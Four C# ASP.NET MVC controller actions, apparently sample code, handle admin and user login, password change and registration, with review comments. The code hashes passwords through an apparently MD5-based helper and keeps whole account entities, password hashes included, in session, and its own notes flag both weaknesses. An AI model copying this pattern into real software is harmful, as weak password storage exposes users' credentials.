Exemplo n.º 1
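        /// <summary>
        /// Handles the admin login form post: looks the account up by user name, verifies the
        /// submitted password against the stored hash and, on success, establishes the admin
        /// session and records the login in <c>LogLogins</c>.
        /// </summary>
        /// <param name="form">Posted form; the "username" and "password" fields are read.</param>
        /// <returns>
        /// A redirect to "Index" on success; otherwise the login view with a generic
        /// "Login failed" message.
        /// </returns>
        /// <remarks>
        /// No credentials are compiled into this action: every login must match a row in
        /// <c>Admins</c>, so each one is verified against the stored hash and written to the
        /// login log. The first admin account has to be provisioned out of band.
        /// NOTE(review): verification is delegated to <c>MD5Cal.VerifyMd5Hash</c>, which is
        /// defined elsewhere; if it is a plain MD5 digest, as the name suggests, stored
        /// passwords should be migrated to a salted, iterated scheme such as PBKDF2.
        /// NOTE(review): the whole <c>Admin</c> entity, including its <c>Password</c> field,
        /// is placed in session state; storing only the user name would expose less.
        /// </remarks>
        public ActionResult Login(FormCollection form)
        {
            string username = form["username"];
            string password = form["password"];

            // A field missing from the post comes back as null; treat that as a failed
            // login instead of dereferencing it.
            if (string.IsNullOrEmpty(username) || string.IsNullOrEmpty(password))
            {
                ViewBag.Message = "Login failed";
                return View();
            }

            Admin admin = data.Admins.SingleOrDefault(i => i.Username == username);

            // Unknown user and wrong password produce the same message, so the response
            // text does not reveal which user names exist.
            if (admin == null || !MD5Cal.VerifyMd5Hash(password, admin.Password))
            {
                ViewBag.Message = "Login failed";
                return View();
            }

            Session["Account"] = admin;
            Session["Role"]    = "Admin";

            // Audit trail: every successful login is recorded.
            LogLogin log = new LogLogin();
            log.Username  = admin.Username;
            log.LoginTime = DateTime.Now;
            data.LogLogins.InsertOnSubmit(log);
            data.SubmitChanges();

            return RedirectToAction("Index");
        }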
Exemplo n.º 2
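        /// <summary>
        /// Changes the password of the account named "admin" after verifying the current
        /// password and checking that the new password was typed identically twice.
        /// </summary>
        /// <param name="form">
        /// Posted form; the "OldPassword", "NewPassword" and "RetypePassword" fields are read.
        /// </param>
        /// <returns>
        /// A redirect to "Login" when the caller is not logged in as admin; otherwise the
        /// view, with either <c>ViewBag.MessageError</c> or <c>ViewBag.MessageSuccess</c> set.
        /// </returns>
        /// <remarks>
        /// The target account is always the fixed user name "admin", regardless of which
        /// admin is logged in.
        /// NOTE(review): hashing is delegated to <c>MD5Cal</c>, defined elsewhere; if it is a
        /// plain MD5 digest, as the name suggests, move to a salted, iterated scheme such as PBKDF2.
        /// NOTE(review): no anti-forgery attribute is visible on this action in this excerpt;
        /// confirm that <c>[ValidateAntiForgeryToken]</c> is applied to this state-changing POST.
        /// </remarks>
        public ActionResult ChangePassword(FormCollection form)
        {
            if (!Manager.LoggedAsAdmin())
            {
                return RedirectToAction("Login");
            }

            string oldpass = form["OldPassword"];
            string newpass = form["NewPassword"];
            string repass  = form["RetypePassword"];

            Admin admin = data.Admins.SingleOrDefault(i => i.Username.Equals("admin"));

            // A missing account row or a missing form field is handled as a failed
            // verification instead of a null dereference.
            if (admin == null
                || string.IsNullOrEmpty(oldpass)
                || !MD5Cal.VerifyMd5Hash(oldpass, admin.Password))
            {
                ViewBag.MessageError = "Mật khẩu cũ không đúng.";
                return View();
            }

            // Refuse to set an empty password.
            if (string.IsNullOrEmpty(newpass))
            {
                ViewBag.MessageError = "Mật khẩu mới không được để trống.";
                return View();
            }

            if (!string.Equals(newpass, repass, StringComparison.Ordinal))
            {
                ViewBag.MessageError = "Mật khẩu mới không trùng khớp.";
                return View();
            }

            string hash = MD5Cal.GetMd5Hash(newpass);

            try
            {
                data.p_ChangePassword("admin", hash);
            }
            catch (Exception ex)
            {
                // Keep exception details (stack trace, SQL text, connection data) on the
                // server; the page only gets a generic failure message.
                System.Diagnostics.Trace.TraceError(ex.ToString());
                ViewBag.MessageError = "Đổi mật khẩu thất bại.";
                return View();
            }

            ViewBag.MessageSuccess = "Đổi mật khẩu thành công.";
            return View();
        }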
Exemplo n.º 3
        /// <summary>
        /// Handles the account login form post: finds the account by user name, checks the
        /// submitted password against the stored hash and, on a match, stores the account
        /// in the session and redirects to the manager index.
        /// </summary>
        /// <param name="form">Posted form; the "acc_username" and "acc_password" fields are read.</param>
        /// <returns>
        /// A redirect to Manager/Index on success; otherwise the login view, with no
        /// failure message set.
        /// </returns>
        /// <remarks>
        /// NOTE(review): the form fields are passed on without a null check, so a post that
        /// omits one hands null to the lookup or to <c>MD5Cal.VerifyMd5Hash</c>; confirm how
        /// that helper treats null.
        /// NOTE(review): if <c>MD5Cal</c> is a plain MD5 digest, as the name suggests, stored
        /// passwords should move to a salted, iterated scheme such as PBKDF2.
        /// NOTE(review): the whole account entity, including <c>acc_password</c>, is kept in
        /// session state.
        /// </remarks>
        public ActionResult Login(FormCollection form)
        {
            string submittedName     = form["acc_username"];
            string submittedPassword = form["acc_password"];

            // Nothing is looked up unless model binding reported no errors.
            if (!ModelState.IsValid)
            {
                return View();
            }

            using (var context = new money_managementEntities())
            {
                account match = context.accounts.FirstOrDefault(a => a.acc_username.Equals(submittedName));

                // The hash is only checked when an account was found.
                bool authenticated = match != null
                                     && MD5Cal.VerifyMd5Hash(submittedPassword, match.acc_password);

                if (!authenticated)
                {
                    return View();
                }

                Session["Account"] = match;
                return RedirectToAction("Index", "Manager");
            }
        }
Exemplo n.º 4
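        /// <summary>
        /// Handles the registration form post: validates the submitted fields, rejects a
        /// user name or e-mail address that is already taken, and creates an unverified
        /// account with a zero balance.
        /// </summary>
        /// <param name="form">
        /// Posted form; the "acc_username", "acc_password", "re_password" and "acc_email"
        /// fields are read.
        /// </param>
        /// <returns>
        /// The registration view with <c>ViewBag.Alert</c> set when validation fails;
        /// otherwise a redirect to "Login".
        /// </returns>
        /// <remarks>
        /// NOTE(review): the existence checks and the insert are not atomic, so two
        /// concurrent requests can both pass the checks. The schema is not visible here;
        /// confirm that unique constraints on the user name and e-mail columns back them up.
        /// NOTE(review): hashing is delegated to <c>MD5Cal.GetMd5Hash</c>, defined elsewhere;
        /// if it is a plain MD5 digest, as the name suggests, use a salted, iterated scheme
        /// such as PBKDF2 for new accounts.
        /// </remarks>
        public ActionResult Register(FormCollection form)
        {
            string username   = form["acc_username"];
            string password   = form["acc_password"];
            string repassword = form["re_password"];
            string email      = form["acc_email"];

            // A field missing from the post comes back as null; reject it up front
            // instead of dereferencing it or storing a blank identity.
            if (string.IsNullOrWhiteSpace(username)
                || string.IsNullOrEmpty(password)
                || string.IsNullOrWhiteSpace(email))
            {
                ViewBag.Alert = "Username, password and email are required.";
                return View();
            }

            // Check password confirm
            if (!string.Equals(password, repassword, StringComparison.Ordinal))
            {
                ViewBag.Alert = "Password does not match.";
                return View();
            }

            // With an invalid model state nothing is looked up or saved and the caller is
            // sent to the login page, as before.
            if (!ModelState.IsValid)
            {
                return RedirectToAction("Login");
            }

            // One context for both lookups and the insert.
            using (var db = new money_managementEntities())
            {
                // Check username exists
                if (db.accounts.Any(x => x.acc_username.Equals(username)))
                {
                    ViewBag.Alert = "Username already exists.";
                    return View();
                }

                // Check email exists
                if (db.accounts.Any(x => x.acc_email.Equals(email)))
                {
                    ViewBag.Alert = "Email already exists.";
                    return View();
                }

                // Create account
                account new_acc = new account
                {
                    acc_username    = username,
                    acc_password    = MD5Cal.GetMd5Hash(password),
                    acc_email       = email,
                    acc_balance     = 0,
                    acc_create_time = DateTime.Now,
                    acc_verified    = false
                };

                db.accounts.Add(new_acc);
                db.SaveChanges();
            }

            return RedirectToAction("Login");
        }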